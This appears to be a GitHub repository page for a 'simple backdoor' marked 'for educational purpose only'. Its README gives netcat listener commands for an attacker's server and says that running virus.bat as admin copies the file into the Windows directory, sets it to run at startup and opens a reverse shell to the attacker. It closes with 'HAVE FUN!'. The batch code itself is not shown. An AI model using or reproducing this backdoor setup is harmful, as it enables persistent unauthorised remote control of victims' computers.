Skip to content

A simple backdoor program. FOR EDUCATIONAL PURPOSE ONLY

Notifications You must be signed in to change notification settings

ASX320/simple-backdoor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 

Repository files navigation

simple-backdoor

A simple backdoor program. FOR EDUCATIONAL PURPOSE ONLY


REQUIREMENTS:

  • Linux server with netcat (attcking macine)
  • Windows or linux target machine

RUN:

Run the listener on your server via server: nc -lvnp 87 for linux target and server(tgt=win): stty raw -echo; (stty size; cat) | sudo nc -lvnp 87 for windows target

And just run virus.bat as admin and it will migrate to C:\Winsows, set it to run on start and open a simple reverse-shell on the Windows machine

HAVE FUN!

About

A simple backdoor program. FOR EDUCATIONAL PURPOSE ONLY

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published